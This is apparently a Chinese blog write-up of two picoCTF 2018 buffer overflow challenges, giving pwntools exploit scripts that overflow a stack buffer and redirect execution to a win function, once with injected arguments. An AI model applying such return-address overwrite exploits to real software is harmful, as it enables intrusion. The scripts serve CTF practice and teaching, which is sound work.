picoctf_2018_buffer overflow 1/2

picoctf_2018_buffer overflow 1

vlun函数存在栈溢出，直接栈溢出到win函数即可

from pwn import *

r=remote('node3.buuoj.cn',25153)
elf=ELF('./PicoCTF_2018_buffer_overflow_1')
win_addr=elf.symbols['win']

payload='a'*0x28+'b'*0x4+p32(win_addr)
r.sendline(payload)

r.interactive()

picoctf_2018_buffer overflow 2

在vuln函数中存在栈溢出，使其溢出跳转到win函数，并传入两个参数0xDEADBEEF和0xDEADC0DE

from pwn import *

r=remote('node3.buuoj.cn',26189)
#r=process('./PicoCTF_2018_buffer_overflow_2')
elf=ELF('./PicoCTF_2018_buffer_overflow_2')
win_addr=elf.symbols['win']

payload='a'*0x6c+'b'*0x4
payload+=p32(win_addr)+p32(0xdeadbeef)+p32(0xDEADBEEF)+p32(0xDEADC0DE)
r.sendline(payload)

r.interactive()

相关阅读:
解决首次在eclipse中使用maven构建hadoop等项目时报Missing artifact sun.jdk:tools:jar:1.5.0的问题
分享eclipse自动生成java注释方法
Android篇Styles和Themes常见用法可能疑点小结
常用文件的MIME类型
C#中如何将字符串转换byte[]，同时如何将byte[]换成字符串
TransactSQL语句进行导入导出[转]
随机索引生成
C#使用ZLIB对字符串进行压缩
C#对XML文件的读操作
SQL语句删除数据库重复记录的方法

原文地址：https://www.cnblogs.com/gaonuoqi/p/12468075.html